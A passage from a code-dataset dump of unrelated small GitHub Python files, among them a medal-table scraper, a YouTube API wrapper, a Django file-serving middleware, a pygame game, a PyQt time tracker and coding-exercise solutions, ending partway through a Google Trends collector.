\"comparing_FOMS_hex.pdf\"))\nplt.show()\n","repo_name":"greenawaysean/bayesianCircuitOptimisation","sub_path":"plot_zero_fidelity_comparison.py","file_name":"plot_zero_fidelity_comparison.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"69947077479","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport csv\r\n\r\nresults = []\r\ndef scraper():\r\n print(\"Gathering data...\")\r\n #Load webpage\r\n url = 'https://olympics.com/tokyo-2020/olympic-games/en/results/all-sports/medal-standings.htm' \r\n response = requests.get(url)\r\n\r\n #parse webpage\r\n soup = BeautifulSoup(response.content, \"html5lib\")\r\n\r\n #grab results table, rows\r\n table = soup.find('tbody')\r\n tableRows = table.find_all(\"tr\")\r\n\r\n #loop thru each row\r\n for row in tableRows:\r\n #Rank, Team/NOC, Gold, Silver, Bronze, Total, Rank by Toal\r\n result = []\r\n\r\n #Ranks, Medal Tags are listed under td tags with class text-center\r\n #for each tag, grab value\r\n #grabs rank, gold, silver, bronze, total, rank by total in that order\r\n\r\n columns = row.find_all(\"td\", class_=\"text-center\")\r\n \r\n for column in columns: \r\n if column.text:\r\n result.append(column.text.strip())\r\n \r\n #grab team, insert it into second position\r\n team = row.find(\"a\", class_=\"country\")\r\n if team != None:\r\n result.insert(1,team.text)\r\n #add result to results list\r\n if result:\r\n results.append(result)\r\n \r\ndef writeOut():\r\n filename = 'olympic_medal_count.csv'\r\n fields = ['Rank', 'Team/NOC','Gold Count', 'Silver Count', 'Bronze Count', 'Total', 'Rank by Total']\r\n print(\"Preparing to Write Data to \" + filename)\r\n\r\n#CHANGE BACK TO A\r\n with open(filename, 'w') as csvfile:\r\n writer = csv.writer(csvfile,lineterminator='\\n')\r\n writer.writerow(fields)\r\n for line in results:\r\n writer.writerow(line)\r\n print(filename + \" successfully written\")\r\n\r\ndef main():\r\n scraper()\r\n writeOut()\r\nmain()\r\n","repo_name":"stone662/OlympicScraper","sub_path":"medalScraper_requests.py","file_name":"medalScraper_requests.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22914531315","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n m = len(board)\n n = len(board[0])\n\n vects = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n history = set()\n isFound = False\n\n def findWord(coordi, lword, history):\n nonlocal isFound\n\n if isFound or coordi in history:\n return\n\n x, y = coordi[0], coordi[1]\n\n if board[y][x] == lword[0]:\n history.add((x, y))\n\n if not lword[1:]:\n isFound = True\n return\n\n for vect in vects:\n nx = x + vect[0]\n ny = y + vect[1]\n\n if 0 <= nx < n and 0 <= ny < m:\n findWord((nx, ny), lword[1:], history)\n\n history.remove((x, y))\n\n for i in range(m):\n for j in range(n):\n findWord((j, i), word, set())\n\n return isFound\n","repo_name":"sigmarion1/daily-algo","sub_path":"leetcode-top-interview-150/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21482020330","text":"from googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom googleapiclient.http import HttpRequest\nimport requests\nimport pandas as pd\nimport json\nfrom utils import duration_to_second, utc_to_local, get_current_time, covert_to_millions\n\nclass YoutubeVideo:\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n ID_SIZE_LIMIT = 50\n YOUTUBE_SEARCH_API_URL = \"https://youtube-search-and-download.p.rapidapi.com/trending\"\n\n def __init__(self, youtube_api_key: str, rapid_api_key: str):\n self.youtube_api_key = youtube_api_key\n self.rapid_api_key = rapid_api_key\n try:\n self.youtube = build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION, developerKey=self.youtube_api_key)\n except Exception as e:\n print(f\"Found error when building youtube video: {e}\")\n raise\n\n\n def get_category(self, category_id: str) -> str:\n \"\"\" Return category title of a given category id \"\"\"\n \n category_data = self.youtube.videoCategories().list(part='snippet', id=category_id).execute()\n\n try:\n # Extract the category name from the category data\n category_name = category_data['items'][0]['snippet']['title']\n except:\n print(\"Something went wrong in get_category_name, please check the API docs\")\n return \"\"\n \n return category_name\n \n\n def get_trending_ids(self) -> list:\n \"\"\"\n Return a list of ids of trending \"now\" videos\n\n Use the Youtube Search and Download API because it returns videos \n the same order as in https://www.youtube.com/feed/trending\n API can be found here: https://rapidapi.com/h0p3rwe/api/youtube-search-and-download\n \n Type of trending videos:\n n - now (default)\n mu - music\n mo - movies\n g - gaming\n \"\"\"\n\n querystring = {\"type\":\"n\",\"hl\":\"en\",\"gl\":\"US\"}\n url = self.YOUTUBE_SEARCH_API_URL\n headers = {\n \"X-RapidAPI-Key\": self.rapid_api_key,\n \"X-RapidAPI-Host\": \"youtube-search-and-download.p.rapidapi.com\"\n }\n\n try:\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response_json = response.json() \n contents = response_json['contents']\n ids = [content[\"video\"][\"videoId\"] for content in contents]\n\n return ids\n \n except Exception as e:\n if \"message\" in response_json:\n e = response_json[\"message\"]\n print(f\"Rapid API error: {e}\")\n raise\n \n\n def handle_api_error(self, e: HttpError): \n try:\n error_content = json.loads(e.content)\n error_msg = error_content.get('error', {}).get('message')\n except:\n error_msg = e\n\n print(f\"API error: {error_msg}\")\n raise\n\n\n def get_response_items(self, request: HttpRequest):\n try:\n response = request.execute()\n items = response['items']\n if len(items) == 0:\n print(f\"No response items returned from the API\")\n return None\n\n return items\n \n except HttpError as e:\n self.handle_api_error(e)\n return None\n\n\n def get_videos_by_ids(self, ids: list) -> pd.DataFrame:\n \"\"\"\n Return a dataframe of Youtube videos\n Refer to https://developers.google.com/youtube/v3/docs/videos/list\n \"\"\"\n # will get 400 error code when there are too many ids in `id` input\n if len(ids) > self.ID_SIZE_LIMIT:\n print(f\"Please make sure the # of id <= {self.ID_SIZE_LIMIT}.\")\n return []\n \n # store attributes of videos\n video_ids = []\n titles = []\n all_published_at = []\n durations = []\n views = []\n categories = []\n all_tags = []\n channel_ids = []\n channel_titles = []\n all_extracted_at = []\n ranks = []\n rank = 1\n df = pd.DataFrame()\n\n # call the API to get videos by ids\n request = self.youtube.videos().list(\n part=\"snippet,contentDetails,statistics\",\n maxResults=self.ID_SIZE_LIMIT,\n id=ids\n )\n\n items = self.get_response_items(request)\n for item in items:\n try:\n try:\n tags = item[\"snippet\"][\"tags\"]\n except:\n tags = \"\"\n \n try:\n published_at = utc_to_local(item[\"snippet\"][\"publishedAt\"])\n except:\n published_at = \"\"\n \n video_ids.append(item[\"id\"])\n titles.append(item[\"snippet\"][\"title\"])\n durations.append(duration_to_second(item[\"contentDetails\"][\"duration\"]))\n views.append(covert_to_millions(item[\"statistics\"].get(\"viewCount\", 0)))\n categories.append(self.get_category(item[\"snippet\"][\"categoryId\"]))\n channel_ids.append(item[\"snippet\"][\"channelId\"])\n channel_titles.append(item[\"snippet\"][\"channelTitle\"])\n all_tags.append(tags)\n all_published_at.append(published_at)\n all_extracted_at.append(get_current_time())\n ranks.append(rank)\n rank += 1\n except Exception as e:\n print(f\"Something went wrong in get_videos_by_ids: {e}\")\n return df\n\n df = pd.DataFrame({\n 'video_id': video_ids,\n 'title': titles,\n 'duration_sec': durations,\n 'views_millions': views,\n 'category': categories,\n 'channel_id': channel_ids,\n 'channel_title': channel_titles,\n 'tags': all_tags,\n 'published_at': all_published_at,\n 'extracted_at': all_extracted_at,\n 'rank': ranks\n })\n\n return df\n\n \n def get_channels_by_ids(self, ids: list) -> pd.DataFrame:\n \"\"\"\n Return a dataframe of Youtube channels\n Refer to https://developers.google.com/youtube/v3/docs/channels/list\n \"\"\"\n \n # will get 400 error code when there are too many video ids in `id` input\n if len(ids) > self.ID_SIZE_LIMIT:\n print(f\"Please make sure the # of id <= {self.ID_SIZE_LIMIT}.\")\n return []\n\n # store attributes of channels\n channel_ids = []\n titles = []\n urls = []\n countries = []\n all_published_at = []\n\n # call the API to get channels by ids\n request = self.youtube.channels().list(\n part=\"snippet\",\n maxResults=self.ID_SIZE_LIMIT,\n id=ids\n )\n items = self.get_response_items(request)\n\n for item in items:\n try:\n try:\n url = item[\"snippet\"][\"customUrl\"]\n except:\n url = \"\"\n try:\n country = item[\"snippet\"][\"country\"]\n except:\n country = \"\"\n try:\n published_at = utc_to_local(item[\"snippet\"][\"publishedAt\"])\n except:\n published_at = \"\"\n\n channel_ids.append(item[\"id\"])\n titles.append(item[\"snippet\"][\"title\"])\n urls.append(url)\n countries.append(country)\n all_published_at.append(published_at)\n except Exception as e:\n print(f\"Something went wrong in get_channels_by_ids: {e}\")\n return []\n \n # save info of channels as dataframe\n df = pd.DataFrame({\n 'channel_id': channel_ids,\n 'channel_title': titles,\n 'custom_url': urls,\n 'country': countries,\n 'published_at': all_published_at\n })\n\n return df\n \n\n def get_combined_data(self, ids: list, request_method: callable, chunk_size: int) -> pd.DataFrame:\n \"\"\" Concat the result of calling request_method\n whose parameter is the ids split by chunk_size\n \"\"\"\n\n chunk_index = 0\n df_combined = pd.DataFrame()\n\n while ids:\n try:\n chunk_ids, ids = ids[:chunk_size], ids[chunk_size:]\n chunk_data = request_method(chunk_ids)\n if \"rank\" in chunk_data.columns:\n # store the index of ranking\n chunk_data[\"rank\"] = chunk_data[\"rank\"] + chunk_index * 50\n chunk_index += 1\n df_combined = pd.concat([df_combined, chunk_data])\n\n except Exception as e:\n print(f\"Found error in get_combined_data: {e}\")\n raise\n\n return df_combined\n \n \n def get_all_videos(self, ids: list) -> pd.DataFrame:\n all_videos = self.get_combined_data(ids=ids, \n request_method=self.get_videos_by_ids, \n chunk_size=self.ID_SIZE_LIMIT)\n\n if \"video_id\" in all_videos.columns:\n # drop duplicates\n all_videos = all_videos.drop_duplicates(subset=[\"video_id\"])\n\n return all_videos\n \n def get_all_channels(self, ids: list) -> pd.DataFrame:\n all_channels = self.get_combined_data(ids=ids, \n request_method=self.get_channels_by_ids, \n chunk_size=self.ID_SIZE_LIMIT)\n if \"channel_id\" in all_channels.columns:\n # drop duplicates\n all_channels = all_channels.drop_duplicates(subset=[\"channel_id\"])\n\n return all_channels\n","repo_name":"eeliuqin/Youtube-Trending-Videos-Pipeline-and-Analysis","sub_path":"youtube_video.py","file_name":"youtube_video.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21813605777","text":"# I want you to have a think about what you just saw in the slides\n# and see if you can create a function called add\n# where you can pass in as many numbers as you want\n# and it will always add together all of the numbers that are being passed into the function as the input,\n# and then return the total sum.\n\n\"\"\"\nhere is my code\ndef add(*args):\n print(args)\n return sum(args)\n\n\nadd(10,4,3)\n\"\"\"\n\ndef add(*args):\n print(args[1])\n sum = 0\n for n in args:\n sum += n\n return sum\n\nprint(add(3,5,6, 2, 1))\n\n\n","repo_name":"ahudspeth199/100_days_of_code","sub_path":"src/day_27_notes/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41381838714","text":"#https://www.codechef.com/problems/MATCHES\n\nl = [6,2,5,5,4,5,6,3,7,6]\nfor _ in range(int(input())):\n a,b=map(int,input().split())\n sum = str(a+b)\n ans = 0\n for i in sum:\n ans += l[int(i)]\n print(ans)","repo_name":"viveakrt/Competitive-programing","sub_path":"CodeChef/MATCHES_playing with matches.py","file_name":"MATCHES_playing with matches.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"18"} +{"seq_id":"20998102783","text":"import os\nimport six\n\nfrom django.conf import settings\nfrom django.core.files.base import File\nfrom django.http import HttpResponse, HttpResponseNotFound, FileResponse\n\ntry:\n from django.utils.deprecation import MiddlewareMixin\nexcept ImportError:\n MiddlewareMixin = object\n\nclass FileProvider(object):\n def get_response(self, response, **options):\n return self._get_response(response, **options)\n\n def _get_response(self, response, **options):\n raise NotImplemented\n\nclass XAccelFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Accel-Redirect'] = response['X-File']\n del response['X-File']\n return response\n\nclass XSendFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Sendfile'] = response['X-File']\n del response['X-File']\n return response\n\nclass XReproxyFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Reproxy-URL'] = response['X-File']\n del response['X-File']\n return response\n\nclass PythonFileProvider(FileProvider):\n def _get_response(self, response, **options):\n # only need this checking when python file provider is given\n if not os.path.exists(response['X-File']):\n return HttpResponseNotFound(\"file not found\")\n return FileResponse(open(response['X-File'], 'rb'))\n\n# Uses X-Sendfile\nApacheFileProvider = XSendFileProvider\nLightHttpdFileProvider = XSendFileProvider\nHiawathaFileProvider = XSendFileProvider\n# Uses X-Accel-Redirect\nNginxFileProvider = XAccelFileProvider\nCaddyFileProvider = XAccelFileProvider\nProxygenFileProvider = XAccelFileProvider\nReproxyFileProvider = XReproxyFileProvider\nH2OFileProvider = ReproxyFileProvider\n\nPROVIDERS = {\n 'python': PythonFileProvider,\n 'nginx': NginxFileProvider,\n 'apache': ApacheFileProvider,\n 'lighthttpd': LightHttpdFileProvider,\n 'caddy': CaddyFileProvider,\n 'hiawatha': HiawathaFileProvider,\n 'proxygen': ProxygenFileProvider,\n 'reproxy': ReproxyFileProvider,\n 'h2o': H2OFileProvider,\n 'uwsgi': XSendFileProvider,\n 'xaccel': XAccelFileProvider,\n 'xsendfile': XSendFileProvider,\n}\n\nclass FileProviderMiddleware(MiddlewareMixin):\n def process_response(self, request, response):\n filepath = response.get('X-File', \"\")\n if filepath != \"\" and isinstance(filepath, six.string_types):\n provider_name = getattr(settings, \"FILEPROVIDER_NAME\", \"python\")\n provider = getattr(settings, \"FILEPROVIDER_BACKEND\", None)\n if not provider:\n provider = PROVIDERS[provider_name]\n response = provider().get_response(response)\n return response\n","repo_name":"sideffect0/django-fileprovider","sub_path":"fileprovider/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"18"} +{"seq_id":"23870498062","text":"# ===== Inicialização =====\n# ----- Importa e inicia pacotes\n\nimport pygame\nimport random\nfrom assets import CANHAO_IMG\n\nfrom config import IMG_DIR\npygame.init()\n\n# ----- Gera tela principal\nWIDTH = 920\nHEIGHT = 690\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Teste')\n\n# ----- Inicia assets\nfundo = pygame.image.load('assets/img/praia.png').convert()\nfonte = pygame.font.SysFont('arial',30,True,True)\n\n#------ Inicia Musicas\n\nmusica = pygame.mixer.music.load('assets/snd/theme.mp3')\nvolume = pygame.mixer.music.set_volume(0.1)\npygame.mixer.music.play(-1)\n\n# ----- Inicia estruturas de dados\ngame = True\nlista_palavras = ['Bola', 'Areia', 'Sol', 'Água', 'Vento', 'Churrasco', 'Carangueijo']\n#palavras = random.choice(lista_palavras)\npalavra_x = random.randint(0,500)\npalavra_y = random.randint(-100,0)\npalavra_velocidadex = random.randint(-3,3)\npalavra_velocidadey = random.randint(2,9)\nclock = pygame.time.Clock()\nFPS = 60\n\nclass PALAVRA(pygame.sprite.Sprite):\n def __init__(self,img):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('assets/img/canhão.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (50, 50))\n #self.image = img\n self.rect = self.image.get_rect()\n self.rect.x = random.randint(0, WIDTH)\n self.rect.y = random.randint(-100,HEIGHT)\n self.speedx = random.randint(-3, 3)\n self.speedy = random.randint(2, 9)\n def uptade (self):\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n\ngame = True\nClock = pygame.time.Clock()\nFPS = 60\n\npal = PALAVRA(CANHAO_IMG)\n\ntodas_palavras = pygame.sprite.Group()\ntodas_sprites = pygame.sprite.Group()\n\n\n# ===== Loop principal =====\nwhile game:\n clock.tick(FPS)\n\n\n # ----- Trata eventos\n\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.QUIT:\n game = False\n\n\n while len(todas_palavras) < 10:\n palavra = PALAVRA(random.choice(lista_palavras))\n todas_palavras.add(palavra)\n todas_sprites.add(palavra)\n\n todas_sprites.update()\n pal.update(\n\n window.blit(pal.image, pal.rect)\n )\n\n\n # ----- Gera saídas\n #window.fill((0, 0, 0)) # Preenche com a cor branca\n window.blit(fundo, (0, 0))\n \n\n # ----- Atualiza estado do jogo\n pygame.display.update() # Mostra o novo frame para o jogador\n\n# ===== Finalização =====\npygame.quit() # Função do PyGame que finaliza os recursos utilizado","repo_name":"Guido-AlvaroPC/Projeto-Final-PYGAME-","sub_path":"OldVersion/jogo v3.py","file_name":"jogo v3.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6288631164","text":"#!/usr/bin/python3\n\"\"\" a class that raises errors \"\"\"\n\n\nclass Square:\n \"\"\"\n a Square class that defines a square\n\n Args:\n size(int): integer size of a square\n \"\"\"\n def __init__(self, size=0):\n\n if (type(size) is not int):\n raise TypeError(\"size must be an integer\")\n elif (size < 0):\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n","repo_name":"ndegwa007/alx-higher_level_programming","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41413658628","text":"#!/usr/bin/env python3\n\n# Created by DJ Watson\n# Created on October 2019\n# this program gets a number from th euser and converts it to a calender month\n\n\ndef main():\n # input\n vowels = set(\"aeiou\")\n consonants = set(\"bcdfghjklmnpqrstvwxz\")\n\n letinput = input(\"input letter (lowercase): \")\n # process and output\n\n if any((c in vowels) for c in letinput):\n print(\"vowel\")\n elif \"y\" in letinput:\n print(\"both\")\n elif any((c in consonants) for c in letinput):\n print(\"consonant\")\n else:\n print(\"Invalid input\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DJ-Watson/ICS3U-Assignment3-Python","sub_path":"assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9363508465","text":"from PyQt5.QtWidgets import QMessageBox, QInputDialog, QWidget, QTableWidgetItem, QFileDialog, QDialog\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import QDateTime\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport datetime\nfrom pathlib import Path\n\nfrom src.ui_datawindow import DataWindow\n\n\nclass UiControler:\n def __init__(self, ui_element):\n self.ui = ui_element\n self.pause_box = ui_element.pause_box\n\n def get_pause(self):\n return int(self.pause_box.text())\n\n def set_pause(self, value):\n self.pause_box.setValue(value)\n\n def show_message(self, message):\n \"\"\" The default messagebox. Uses a QMessageBox with OK-Button \"\"\"\n msgBox = QMessageBox()\n msgBox.setStandardButtons(QMessageBox.Ok)\n msgBox.setText(str(message))\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n msgBox.setWindowTitle(\"Information\")\n msgBox.show()\n msgBox.exec_()\n\n def report_choice(self):\n msgBox = QMessageBox()\n msgBox.setText(\"Would you like the report of the overtime (0 if none or the amount) or of the regular hours?\")\n msgBox.setWindowTitle(\"Report Generation\")\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n overtime_button = msgBox.addButton(\"Overtime\", QMessageBox.YesRole)\n time_button = msgBox.addButton(\"Time\", QMessageBox.NoRole)\n msgBox.addButton(\"Cancel\", QMessageBox.RejectRole)\n\n msgBox.exec_()\n if msgBox.clickedButton() == overtime_button:\n return True\n elif msgBox.clickedButton() == time_button:\n return False\n return None\n\n def user_okay(self, text):\n msgBox = QMessageBox()\n msgBox.setText(text)\n msgBox.setWindowTitle(\"Confirmation required\")\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n yes_button = msgBox.addButton(\"Yes\", QMessageBox.YesRole)\n msgBox.addButton(\"No\", QMessageBox.NoRole)\n msgBox.exec_()\n if msgBox.clickedButton() == yes_button:\n return True\n return False\n\n def get_text(self, attribute):\n text, ok = QInputDialog.getText(self.ui, \"Getting data for config\", f\"Enter your {attribute}:\")\n return (text, ok)\n\n def get_folder(self, current_path):\n if not current_path:\n current_path = str(Path.home())\n\n dialog = QFileDialog(self.ui)\n dialog.setFileMode(QFileDialog.DirectoryOnly)\n dialog.setDirectory(current_path)\n\n if dialog.exec_() == QDialog.Accepted:\n path = dialog.selectedFiles()[0] # returns a list\n return path\n else:\n return \"\"\n\n # fname = QFileDialog.getOpenFileName(self.ui, \"Set folder to save reports\", current_path)\n # return fname\n\n def open_event_window(self, button_controler):\n self.ui.event_window = DataWindow(self.ui, button_controler)\n self.ui.event_window.date_edit.setDateTime(QDateTime.currentDateTime())\n self.ui.event_window.show()\n\n def fill_table(self, entry):\n rowPosition = self.ui.event_window.tableWidget.rowCount()\n self.ui.event_window.tableWidget.insertRow(rowPosition)\n for i, data in enumerate(entry):\n self.ui.event_window.tableWidget.setItem(rowPosition, i, QTableWidgetItem(data))\n\n def clear_table(self):\n while self.ui.event_window.tableWidget.rowCount() > 0:\n self.ui.event_window.tableWidget.removeRow(0)\n\n def get_event_date(self):\n qt_date = self.ui.event_window.date_edit.date()\n return datetime.date(qt_date.year(), qt_date.month(), qt_date.day())\n\n def get_past_date(self):\n qt_object = self.ui.past_datetime_edit.dateTime()\n qt_date = qt_object.date()\n return datetime.date(qt_date.year(), qt_date.month(), qt_date.day())\n\n def get_past_datetime(self):\n qt_object = self.ui.past_datetime_edit.dateTime()\n qt_date = qt_object.date()\n qt_time = qt_object.time()\n return datetime.datetime(\n qt_date.year(), qt_date.month(), qt_date.day(), qt_time.hour(), qt_time.minute(), qt_time.second()\n )\n\n def view_day(self):\n if self.ui.event_window.switch_button.isChecked():\n return True\n return False\n\n def set_date_toggle(self):\n if self.view_day():\n self.ui.event_window.switch_button.setText(\"Day\")\n else:\n self.ui.event_window.switch_button.setText(\"Month\")\n\n def set_monthly_header(self):\n self.set_header_names(\"Date\", \"Worktime (h)\")\n\n def set_daily_header(self):\n self.set_header_names(\"Datetime / Type\", \"Event / Pausetime (min)\")\n\n def set_header_names(self, name1, name2):\n item = self.ui.event_window.tableWidget.horizontalHeaderItem(0)\n item.setText(name1)\n item = self.ui.event_window.tableWidget.horizontalHeaderItem(1)\n item.setText(name2)\n\n def handle_delete_button(self, trigger_function):\n if self.view_day():\n self.create_delete_button(trigger_function)\n else:\n self.remove_delete_button()\n\n def create_delete_button(self, trigger_function):\n delete_button = QtWidgets.QPushButton(self.ui.event_window)\n delete_button.setMinimumSize(QtCore.QSize(0, 50))\n delete_button.setMaximumSize(QtCore.QSize(10000, 100))\n font = QtGui.QFont()\n font.setPointSize(18)\n delete_button.setFont(font)\n delete_button.setObjectName(\"delete_button\")\n delete_button.setText(\"Delete\")\n delete_button.clicked.connect(trigger_function)\n self.ui.event_window.delete_button = delete_button\n self.ui.event_window.verticalLayout.addWidget(self.ui.event_window.delete_button)\n\n def remove_delete_button(self):\n self.ui.event_window.verticalLayout.removeWidget(self.ui.event_window.delete_button)\n self.ui.event_window.delete_button.deleteLater()\n self.ui.event_window.delete_button = None\n\n def get_selected_event(self):\n indexes = self.ui.event_window.tableWidget.selectionModel().selectedRows()\n if indexes:\n row = indexes[0].row()\n event_datetime = self.ui.event_window.tableWidget.item(row, 0).text()\n event = self.ui.event_window.tableWidget.item(row, 1).text()\n if event_datetime == \"Pause\":\n return None, None\n return event_datetime, event\n return None, None\n","repo_name":"AndreWohnsland/TimeTracker","sub_path":"src/ui_controler.py","file_name":"ui_controler.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"72976277160","text":"import matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef LDA_Model():\n iris = datasets.load_iris() # get the data iris from the sklearn datasets\n A = iris.data #assigning the data to A\n B = iris.target #assigning the target to B\n target_names = iris.target_names\n A_train, A_test, B_train, B_test = train_test_split(A, B, test_size=0.20) # Assigning the test and train data\n cf = KNeighborsClassifier(n_neighbors=3) # Defining KNeighbourClassifier\n cf.fit(A_train, B_train) # Fit the train data to the model\n B_pred = cf.predict(A_test) # Predict the value using the model.\n l = LinearDiscriminantAnalysis(n_components=3) # Defining the model Linear Discriminant Analysis\n A_R = l.fit(A_test, B_pred).transform(A)\n colors = ['green', 'blue', 'orange']\n for color, i, target_name in zip(colors, [0, 1, 2], target_names):\n plt.scatter(A_R[B == i, 0], A_R[B == i, 1], alpha=1, color=color, label=target_name) # Scattering the data\n plt.legend(loc='best', shadow=False, scatterpoints=1) #places a legend in the axes\n plt.show() # Show the scattered points on the graph\n\nif __name__ == '__main__':\n LDA_Model()","repo_name":"deviprasadkada/PythonDeepLearn","sub_path":"ICP5/Linear_Discriminant_Analysis.py","file_name":"Linear_Discriminant_Analysis.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43095495144","text":"# Ceiling of a number:\n# The ceiling of a number is the number which is the smaller number in the array which greater than or eqaul to the\n# target number\ndef CeilingOfNumber(arr, target):\n # What if target is greater than the greatest number of an array\n if target > arr[len(arr) - 1]:\n return -1\n start = 0\n end = len(arr) - 1\n while start <= end:\n mid = int((start + end) / 2)\n if arr[mid] == target:\n return arr[mid]\n if arr[mid] < target:\n start = mid + 1\n if arr[mid] > target:\n end = mid - 1\n return start\n\n\narr = [2, 3, 5, 9, 14, 16, 18]\ntarget = 13\nprint(CeilingOfNumber(arr, target))\n","repo_name":"prkapadnis/Data-Structure-Python","sub_path":"Searching/Binary Search/ceilingOfNumber.py","file_name":"ceilingOfNumber.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"34756572983","text":"# coding:utf-8\n# JSRUN引擎2.0,支持多达30种语言在线运行,全仿真在线交互输入输出。\nimport functools\nimport sys\nfrom collections import Counter, defaultdict\nimport copy\nfrom itertools import permutations\nimport re\nimport math\nimport sys\n\nn = int(input())\n\npoint = []\n\nfor i in range(n):\n point.append(list(map(int, input().split(\" \"))))\n\npoint.sort(key=lambda x: (x[0], x[1]))\n\nif n < 4:\n print(0)\nelse:\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n tmp_x = 0\n tmp_y = 0\n tmp_x = point[i][0] + point[i][1] - point[j][1]\n tmp_y = point[i][1] + point[j][0] - point[i][0]\n if ([tmp_x, tmp_y]) not in point:\n continue\n tmp_x = point[j][0] + point[i][1] - point[j][1]\n tmp_y = point[j][1] + point[j][0] - point[i][0]\n if ([tmp_x, tmp_y]) not in point:\n continue\n ans += 1\n print(int(ans / 2))","repo_name":"haunglai/odpython","sub_path":"正方形数量/正方形数量.py","file_name":"正方形数量.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23852902847","text":"from pytrends.request import TrendReq\nimport matplotlib.pyplot as plt\nfrom treadweb.collector.data_collector import DataCollector\nimport random\n\nclass GoogleTrend(DataCollector): # 구글 트렌드를 통해 정보를 가져오는 클래스\n\n def __init__(self, keyword = ['youtube'], hl = 'ko', tz = '82', timeframe = 'today 5-y', cat = 0, geo = 'KR', gprop = ''): # 생성자 기본 설정 값\n self.hl = hl\n self.tz = tz\n self.keyword = keyword\n self.timeframe = timeframe\n self.cat = cat\n self.geo = geo\n self.gprop = gprop\n self.update_pytrend()\n self.update_payload()\n\n # Login to Google. Only need to run this once, the rest of requests will use the same session.\n def update_pytrend(self):\n self.pytrend = TrendReq(hl=self.hl, tz=self.tz)\n\n # Create payload and capture API tokens. Only needed for interest_over_time(), interest_by_region() & related_queries()\n def update_payload(self):\n self.pytrend.build_payload(kw_list=self.keyword, cat=self.cat, timeframe=self.timeframe, geo=self.geo, gprop=self.gprop)\n\n def set_pytrend(self, hl = 'None', tz = 'None'): # hl는 host language, tz는 time zone\n if hl != 'None': # ex) 'ko', 'en_US'\n self.hl = hl\n if tz != 'None': # ex) 82:한국, 360:미국\n self.tz = tz\n self.update_pytrend()\n self.update_payload()\n\n def set_payload(self, keyword = None, timeframe = 'None', cat = -1, geo = 'None', gprop = 'None'): # 키워드리스트, 타임프레임, 카테고리, 지역, 구글 프로퍼티\n if keyword != None :\n self.keyword = keyword\n if timeframe != 'None': # ex) 'all', 'today 5-y', 'today 1,2,3-m', 'now 1,7-d', 'now 1,4-H', '2018-05-20 2019-01-20'\n self.timeframe = timeframe\n if cat != -1:\n self.cat = cat\n if geo != 'None': # ex) 'KR', 'US', ''\n self.geo = geo\n if gprop != 'None': # ex) 'images', 'news', 'youtube', 'froogle'\n self.gprop = gprop\n self.update_payload()\n\n def load_data(self, keyword=None):\n if keyword == 'region':\n self.interest_by_region()\n return self.interest_by_region_df_to_list()\n elif keyword == 'gender':\n return self.search_rate_by_gender()\n\n # Interest Over Time\n def interest_over_time(self):\n self.interest_over_time_df = self.pytrend.interest_over_time() # Returns 